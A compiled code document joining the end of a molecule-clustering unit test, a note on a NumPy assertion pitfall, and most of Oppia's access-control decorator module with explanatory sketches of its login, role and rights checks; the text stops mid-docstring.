self.assertLessEqual(
len(set(molecule_set.get_cluster_labels())),
n_clusters,
"Expected number of cluster labels to be "
"less than or equal to number of clusters",
)
if molecule_set.similarity_measure.type_ == "continuous":
self.assertEqual(
str(molecule_set.clusters_),
"kmedoids",
f"Expected kmedoids clustering for "
f"similarity: {similarity_measure}",
)
else:
self.assertEqual(
str(molecule_set.clusters_),
"complete_linkage",
f"Expected complete_linkage clustering "
f"for similarity: {similarity_measure}",
)
else:
with self.assertRaises(InvalidConfigurationError):
molecule_set.cluster(n_clusters=n_clusters)
if __name__ == "__main__":
unittest.main()
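The descriptor assertions in the tests above compare NumPy arrays inside `assertTrue`. A subtle pitfall there is that `(x == y).all` without call parentheses is a bound method object, which is always truthy, so the assertion can never fail. A minimal, self-contained illustration of the difference:

```python
import numpy as np

a = np.array([1.0, 2.0, 3.0])
b = np.array([1.0, 2.0, 9.0])

# `.all` without parentheses is a bound method object, which is always
# truthy, so an assertTrue on it would pass even for unequal arrays.
method_object_is_truthy = bool((a == b).all)

# Calling `.all()` actually reduces the elementwise comparison.
arrays_equal = bool((a == b).all())

print(method_object_is_truthy, arrays_equal)  # True False
```

This is why array-equality checks in tests should always call `.all()` (or use `numpy.testing.assert_array_equal`, which also produces a readable failure message).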
# Source file: core/controllers/acl_decorators.py (repo: huntermaxfield/oppia, license: Apache-2.0)
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Decorators to provide authorization across the site."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import functools
from constants import constants
from core.controllers import base
from core.domain import classifier_services
from core.domain import classroom_services
from core.domain import feedback_services
from core.domain import question_services
from core.domain import rights_manager
from core.domain import role_services
from core.domain import skill_domain
from core.domain import skill_fetchers
from core.domain import story_domain
from core.domain import story_fetchers
from core.domain import subtopic_page_services
from core.domain import suggestion_services
from core.domain import topic_domain
from core.domain import topic_fetchers
from core.domain import topic_services
from core.domain import user_services
import feconf
import utils
def _redirect_based_on_return_type(
handler, redirection_url, expected_return_type):
"""Redirects to the provided URL if the handler type is not JSON.
Args:
handler: function. The function to be decorated.
redirection_url: str. The URL to redirect to.
expected_return_type: str. The type of the response to be returned
in case of errors, e.g. html, json.
Raises:
PageNotFoundException. The page is not found.
"""
if expected_return_type == feconf.HANDLER_TYPE_JSON:
raise handler.PageNotFoundException
else:
handler.redirect(redirection_url)
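The branch above encodes a simple rule: JSON handlers cannot usefully follow a redirect, so they receive a not-found error, while HTML handlers are sent to a fallback page. A minimal standalone sketch of that dispatch decision (the dict return values are hypothetical stand-ins for the real response objects, not Oppia's API):

```python
def dispatch_error(expected_return_type, redirection_url):
    """Toy version of the JSON-vs-HTML error dispatch above."""
    # JSON clients expect a payload, not a Location header, so they
    # get a 404-style error; HTML clients are redirected instead.
    if expected_return_type == 'json':
        return {'status': 404}
    return {'status': 302, 'location': redirection_url}

print(dispatch_error('json', '/learn/math'))
print(dispatch_error('html', '/learn/math'))
```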
def open_access(handler):
"""Decorator to give access to everyone.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that can also give access to
everyone.
"""
def test_can_access(self, *args, **kwargs):
"""Gives access to everyone.
Args:
*args: list(*). A list of arguments.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
"""
return handler(self, *args, **kwargs)
test_can_access.__wrapped__ = True
return test_can_access
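The decorators in this module all follow the same shape: wrap the handler, run an access check, delegate on success, and mark the wrapper with `__wrapped__` so tests can detect that a handler is decorated. A minimal standalone sketch of that pattern (the `is_admin` check and class names here are illustrative, not part of Oppia's API):

```python
def require_admin(handler):
    """Toy access decorator with the same shape as those in this module."""
    def test_can_access(self, *args, **kwargs):
        # `self.is_admin` is a stand-in for the real user/rights checks
        # performed by the production decorators.
        if not getattr(self, 'is_admin', False):
            raise PermissionError('admin access required')
        return handler(self, *args, **kwargs)
    test_can_access.__wrapped__ = True
    return test_can_access


class FakeHandler:
    is_admin = True

    @require_admin
    def get(self):
        return 'ok'


print(FakeHandler().get())  # ok
```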
def does_classroom_exist(handler):
"""Decorator to check whether classroom exists.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function.
"""
def test_does_classroom_exist(self, classroom_url_fragment, **kwargs):
"""Checks if classroom url fragment provided is valid. If so, return
handler or else redirect to the correct classroom.
Args:
classroom_url_fragment: str. The classroom url fragment.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
"""
classroom = classroom_services.get_classroom_by_url_fragment(
classroom_url_fragment)
if not classroom:
_redirect_based_on_return_type(
self, '/learn/%s' % constants.DEFAULT_CLASSROOM_URL_FRAGMENT,
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
return handler(self, classroom_url_fragment, **kwargs)
test_does_classroom_exist.__wrapped__ = True
return test_does_classroom_exist
def can_play_exploration(handler):
"""Decorator to check whether user can play given exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now can check if users can
play a given exploration.
"""
def test_can_play(self, exploration_id, **kwargs):
"""Checks if the user can play the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
"""
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise self.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise self.PageNotFoundException
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise self.PageNotFoundException
test_can_play.__wrapped__ = True
return test_can_play
def can_view_skills(handler):
"""Decorator to check whether user can view multiple given skills.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that can also check if the user
can view multiple given skills.
"""
def test_can_view(self, comma_separated_skill_ids, **kwargs):
"""Checks if the user can view the skills.
Args:
comma_separated_skill_ids: str. The skill ids
separated by commas.
**kwargs: *. Keyword arguments.
Returns:
bool. Whether the user can view the given skills.
Raises:
PageNotFoundException. The page is not found.
"""
# This is a temporary check, since a decorator is required for every
# method. Once skill publishing is done, whether given skill is
# published should be checked here.
skill_ids = comma_separated_skill_ids.split(',')
try:
for skill_id in skill_ids:
skill_domain.Skill.require_valid_skill_id(skill_id)
except utils.ValidationError:
raise self.InvalidInputException
try:
skill_fetchers.get_multi_skills(skill_ids)
except Exception as e:
raise self.PageNotFoundException(e)
return handler(self, comma_separated_skill_ids, **kwargs)
test_can_view.__wrapped__ = True
return test_can_view
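# can_view_skills splits the comma-separated id string and validates each id
# before fetching. A standalone sketch of that split-then-validate loop (the
# function and validator here are invented for illustration; the real check
# uses skill_domain.Skill.require_valid_skill_id):

```python
def validate_ids(comma_separated_ids, is_valid_id):
    """Splits a comma-separated id string and validates every id.

    Raises ValueError on the first invalid id, mirroring how the
    decorator converts a validation failure into InvalidInputException.
    """
    ids = comma_separated_ids.split(',')
    for one_id in ids:
        if not is_valid_id(one_id):
            raise ValueError('Invalid id: %s' % one_id)
    return ids
```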
def can_play_collection(handler):
"""Decorator to check whether user can play given collection.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that can also check if a user can
play a given collection.
"""
def test_can_play(self, collection_id, **kwargs):
"""Checks if the user can play the collection.
Args:
collection_id: str. The collection id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
"""
collection_rights = rights_manager.get_collection_rights(
collection_id, strict=False)
if collection_rights is None:
raise self.PageNotFoundException
if rights_manager.check_can_access_activity(
self.user, collection_rights):
return handler(self, collection_id, **kwargs)
else:
raise self.PageNotFoundException
test_can_play.__wrapped__ = True
return test_can_play
def can_download_exploration(handler):
"""Decorator to check whether user can download given exploration.
If a user is authorized to play given exploration, they can download it.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that can also check if the user
has permission to download a given exploration.
"""
def test_can_download(self, exploration_id, **kwargs):
"""Checks if the user can download the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
"""
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise base.UserFacingExceptions.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise self.PageNotFoundException
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise self.PageNotFoundException
test_can_download.__wrapped__ = True
return test_can_download
def can_view_exploration_stats(handler):
"""Decorator to check whether user can view exploration stats.
If a user is authorized to play given exploration, they can view its stats.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that checks if the user
has permission to view exploration stats.
"""
def test_can_view_stats(self, exploration_id, **kwargs):
"""Checks if the user can view the exploration stats.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
"""
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise base.UserFacingExceptions.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise self.PageNotFoundException
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.PageNotFoundException
test_can_view_stats.__wrapped__ = True
return test_can_view_stats
def can_edit_collection(handler):
"""Decorator to check whether the user can edit collection.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that checks if the user has
permission to edit a given collection.
"""
def test_can_edit(self, collection_id, **kwargs):
"""Checks if the user is logged in and can edit the collection.
Args:
collection_id: str. The collection id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to edit the collection.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
collection_rights = rights_manager.get_collection_rights(
collection_id, strict=False)
if collection_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_edit_activity(
self.user, collection_rights):
return handler(self, collection_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to edit this collection.')
test_can_edit.__wrapped__ = True
return test_can_edit
def can_manage_email_dashboard(handler):
"""Decorator to check whether user can access email dashboard.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks if the user has
permission to access the email dashboard.
"""
def test_can_manage_emails(self, **kwargs):
"""Checks if the user is logged in and can access email dashboard.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
access the email dashboard.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if role_services.ACTION_MANAGE_EMAIL_DASHBOARD in self.user.actions:
return handler(self, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to access email dashboard.')
test_can_manage_emails.__wrapped__ = True
return test_can_manage_emails
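# The role-based decorators (email dashboard, moderator page, moderator
# emails, etc.) all reduce to a membership test on self.user.actions. A
# standalone sketch of that lookup (the role table below is invented for
# illustration; the real action strings come from role_services):

```python
# Hypothetical role-to-actions table.
ROLE_ACTIONS = {
    'moderator': {
        'ACTION_ACCESS_MODERATOR_PAGE', 'ACTION_SEND_MODERATOR_EMAILS'},
    'learner': set(),
}


def user_actions(roles):
    """Returns the union of the actions granted by each of the roles."""
    actions = set()
    for role in roles:
        actions |= ROLE_ACTIONS.get(role, set())
    return actions


def has_action(roles, action):
    """Mirrors the `action in self.user.actions` membership test."""
    return action in user_actions(roles)
```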
def can_access_moderator_page(handler):
"""Decorator to check whether user can access moderator page.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks if the user has
permission to access the moderator page.
"""
def test_can_access_moderator_page(self, **kwargs):
"""Checks if the user is logged in and can access moderator page.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
access the moderator page.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if role_services.ACTION_ACCESS_MODERATOR_PAGE in self.user.actions:
return handler(self, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to access moderator page.')
test_can_access_moderator_page.__wrapped__ = True
return test_can_access_moderator_page
def can_send_moderator_emails(handler):
"""Decorator to check whether user can send moderator emails.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to send moderator emails.
"""
def test_can_send_moderator_emails(self, **kwargs):
"""Checks if the user is logged in and can send moderator emails.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
send moderator emails.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if role_services.ACTION_SEND_MODERATOR_EMAILS in self.user.actions:
return handler(self, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to send moderator emails.')
test_can_send_moderator_emails.__wrapped__ = True
return test_can_send_moderator_emails
def can_manage_own_account(handler):
"""Decorator to check whether user can manage their account.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to manage their account.
"""
def test_can_manage_account(self, **kwargs):
"""Checks if the user is logged in and can manage their account.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
manage account or preferences.
"""
if not self.user_id:
raise self.NotLoggedInException
if role_services.ACTION_MANAGE_ACCOUNT in self.user.actions:
return handler(self, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to manage account or preferences.')
test_can_manage_account.__wrapped__ = True
return test_can_manage_account
def can_access_admin_page(handler):
"""Decorator that checks if the current user is a super admin.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
is a super admin.
"""
def test_super_admin(self, **kwargs):
"""Checks if the user is logged in and is a super admin.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user is not a super admin of the
application.
"""
if not self.user_id:
raise self.NotLoggedInException
if not self.current_user_is_super_admin:
raise self.UnauthorizedUserException(
'%s is not a super admin of this application' % self.user_id)
return handler(self, **kwargs)
test_super_admin.__wrapped__ = True
return test_super_admin
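# Every wrapper in this module sets `__wrapped__ = True` before being
# returned. One plausible consumer of that marker is an audit that verifies
# every handler method has some ACL decorator applied; a sketch under that
# assumption (the audit helper and handler classes below are hypothetical):

```python
def require_login(handler):
    """Minimal stand-in for an ACL decorator; sets the audit marker."""
    def wrapper(self, **kwargs):
        return handler(self, **kwargs)
    wrapper.__wrapped__ = True
    return wrapper


def undecorated_methods(handler_cls, method_names):
    """Returns the listed method names that lack the __wrapped__ marker."""
    return [
        name for name in method_names
        if not getattr(getattr(handler_cls, name), '__wrapped__', False)]


class GoodHandler:
    @require_login
    def get(self):
        return 'ok'


class BadHandler:
    def get(self):
        return 'ok'
```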
def can_delete_any_user(handler):
"""Decorator that checks if the current user can delete any user.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
can delete any user.
"""
def test_primary_admin(self, **kwargs):
"""Checks if the user is logged in and is a primary admin e.g. user with
email address equal to feconf.SYSTEM_EMAIL_ADDRESS.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user is not a primary admin of the
application.
"""
if not self.user_id:
raise self.NotLoggedInException
email = user_services.get_email_from_user_id(self.user_id)
if email != feconf.SYSTEM_EMAIL_ADDRESS:
raise self.UnauthorizedUserException(
'%s cannot delete any user.' % self.user_id)
return handler(self, **kwargs)
test_primary_admin.__wrapped__ = True
return test_primary_admin
def can_upload_exploration(handler):
"""Decorator that checks if the current user can upload exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to upload an exploration.
"""
def test_can_upload(self, **kwargs):
"""Checks if the user can upload exploration.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
upload an exploration.
"""
if not self.user_id:
raise self.NotLoggedInException
if not self.current_user_is_super_admin:
raise self.UnauthorizedUserException(
'You do not have credentials to upload explorations.')
return handler(self, **kwargs)
test_can_upload.__wrapped__ = True
return test_can_upload
def can_create_exploration(handler):
"""Decorator to check whether the user can create an exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to create an exploration.
"""
def test_can_create(self, **kwargs):
"""Checks if the user can create an exploration.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
create an exploration.
"""
if self.user_id is None:
raise self.NotLoggedInException
if role_services.ACTION_CREATE_EXPLORATION in self.user.actions:
return handler(self, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to create an exploration.')
test_can_create.__wrapped__ = True
return test_can_create
def can_create_collection(handler):
"""Decorator to check whether the user can create a collection.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to create a collection.
"""
def test_can_create(self, **kwargs):
"""Checks if the user can create a collection.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
create a collection.
"""
if self.user_id is None:
raise self.NotLoggedInException
if role_services.ACTION_CREATE_COLLECTION in self.user.actions:
return handler(self, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to create a collection.')
test_can_create.__wrapped__ = True
return test_can_create
def can_access_creator_dashboard(handler):
"""Decorator to check whether the user can access creator dashboard page.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a
user has permission to access the creator dashboard page.
"""
def test_can_access(self, **kwargs):
"""Checks if the user can access the creator dashboard page.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
access creator dashboard.
"""
if self.user_id is None:
raise self.NotLoggedInException
if role_services.ACTION_ACCESS_CREATOR_DASHBOARD in self.user.actions:
return handler(self, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to access creator dashboard.')
test_can_access.__wrapped__ = True
return test_can_access
def can_create_feedback_thread(handler):
"""Decorator to check whether the user can create a feedback thread.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to create a feedback thread.
"""
def test_can_access(self, exploration_id, **kwargs):
"""Checks if the user can create a feedback thread.
Args:
exploration_id: str. The ID of the exploration where the thread will
be created.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
create an exploration feedback.
"""
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise base.UserFacingExceptions.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to create exploration feedback.')
test_can_access.__wrapped__ = True
return test_can_access
def can_view_feedback_thread(handler):
"""Decorator to check whether the user can view a feedback thread.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to view a feedback thread.
"""
def test_can_access(self, thread_id, **kwargs):
"""Checks if the user can view a feedback thread.
Args:
thread_id: str. The feedback thread id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
InvalidInputException. The thread ID is not valid.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
view an exploration feedback.
"""
if '.' not in thread_id:
raise self.InvalidInputException('Thread ID must contain a .')
entity_type = feedback_services.get_thread(thread_id).entity_type
entity_types_with_unrestricted_view_suggestion_access = (
feconf.ENTITY_TYPES_WITH_UNRESTRICTED_VIEW_SUGGESTION_ACCESS)
if entity_type in entity_types_with_unrestricted_view_suggestion_access:
return handler(self, thread_id, **kwargs)
exploration_id = feedback_services.get_exp_id_from_thread_id(thread_id)
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise base.UserFacingExceptions.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, thread_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to view exploration feedback.')
test_can_access.__wrapped__ = True
return test_can_access
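# The thread-id handling above treats ids as dot-separated, with the entity
# type first; the `'.' not in thread_id` test is a cheap format guard before
# the datastore lookup. A sketch of that parse (the exact id layout is
# assumed from the checks here, not from a documented spec):

```python
def get_entity_info_from_thread_id(thread_id):
    """Returns (entity_type, entity_id), raising ValueError on bad format."""
    if '.' not in thread_id:
        raise ValueError('Thread ID must contain a .')
    parts = thread_id.split('.')
    return parts[0], parts[1]
```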
def can_comment_on_feedback_thread(handler):
"""Decorator to check whether the user can comment on feedback thread.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to comment on a given feedback thread.
"""
def test_can_access(self, thread_id, **kwargs):
"""Checks if the user can comment on the feedback thread.
Args:
thread_id: str. The feedback thread id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
InvalidInputException. The thread ID is not valid.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
comment on an exploration feedback.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if '.' not in thread_id:
raise self.InvalidInputException('Thread ID must contain a .')
exploration_id = feedback_services.get_exp_id_from_thread_id(thread_id)
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise base.UserFacingExceptions.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, thread_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to comment on exploration'
' feedback.')
test_can_access.__wrapped__ = True
return test_can_access
def can_rate_exploration(handler):
"""Decorator to check whether the user can give rating to given
exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to rate a given exploration.
"""
def test_can_rate(self, exploration_id, **kwargs):
"""Checks if the user can rate the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
rate an exploration.
"""
if (role_services.ACTION_RATE_ANY_PUBLIC_EXPLORATION in
self.user.actions):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to give ratings to explorations.')
test_can_rate.__wrapped__ = True
return test_can_rate
def can_flag_exploration(handler):
"""Decorator to check whether user can flag given exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
a user can flag a given exploration.
"""
def test_can_flag(self, exploration_id, **kwargs):
"""Checks if the user can flag the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
flag an exploration.
"""
if role_services.ACTION_FLAG_EXPLORATION in self.user.actions:
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to flag explorations.')
test_can_flag.__wrapped__ = True
return test_can_flag
def can_subscribe_to_users(handler):
"""Decorator to check whether user can subscribe/unsubscribe a creator.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to subscribe/unsubscribe a creator.
"""
def test_can_subscribe(self, **kwargs):
"""Checks if the user can subscribe/unsubscribe a creator.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
manage subscriptions.
"""
if role_services.ACTION_SUBSCRIBE_TO_USERS in self.user.actions:
return handler(self, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to manage subscriptions.')
test_can_subscribe.__wrapped__ = True
return test_can_subscribe
def can_edit_exploration(handler):
"""Decorator to check whether the user can edit given exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
a user has permission to edit a given exploration.
"""
def test_can_edit(self, exploration_id, *args, **kwargs):
"""Checks if the user can edit the exploration.
Args:
exploration_id: str. The exploration id.
*args: list(*). A list of arguments.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
edit an exploration.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_edit_activity(
self.user, exploration_rights):
return handler(self, exploration_id, *args, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to edit this exploration.')
test_can_edit.__wrapped__ = True
return test_can_edit
def can_voiceover_exploration(handler):
"""Decorator to check whether the user can voiceover given exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to voiceover a given exploration.
"""
def test_can_voiceover(self, exploration_id, **kwargs):
"""Checks if the user can voiceover the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
voiceover an exploration.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_voiceover_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to voiceover this exploration.')
test_can_voiceover.__wrapped__ = True
return test_can_voiceover
def can_save_exploration(handler):
"""Decorator to check whether user can save exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that checks if
a user has permission to save a given exploration.
"""
def test_can_save(self, exploration_id, **kwargs):
"""Checks if the user can save the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
save changes to this exploration.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_save_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have permissions to save this exploration.')
test_can_save.__wrapped__ = True
return test_can_save
def can_delete_exploration(handler):
"""Decorator to check whether user can delete exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that checks if a user has
permission to delete a given exploration.
"""
def test_can_delete(self, exploration_id, **kwargs):
"""Checks if the user can delete the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have permissions to
delete an exploration.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if rights_manager.check_can_delete_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'User %s does not have permissions to delete exploration %s' %
(self.user_id, exploration_id))
test_can_delete.__wrapped__ = True
return test_can_delete
def can_suggest_changes_to_exploration(handler):
"""Decorator to check whether a user can make suggestions to an
exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to make suggestions to an exploration.
"""
def test_can_suggest(self, exploration_id, **kwargs):
"""Checks if the user can make suggestions to an exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
give suggestions to an exploration.
"""
if role_services.ACTION_SUGGEST_CHANGES in self.user.actions:
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to give suggestions to this '
'exploration.')
test_can_suggest.__wrapped__ = True
return test_can_suggest
def can_suggest_changes(handler):
"""Decorator to check whether a user can make suggestions.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
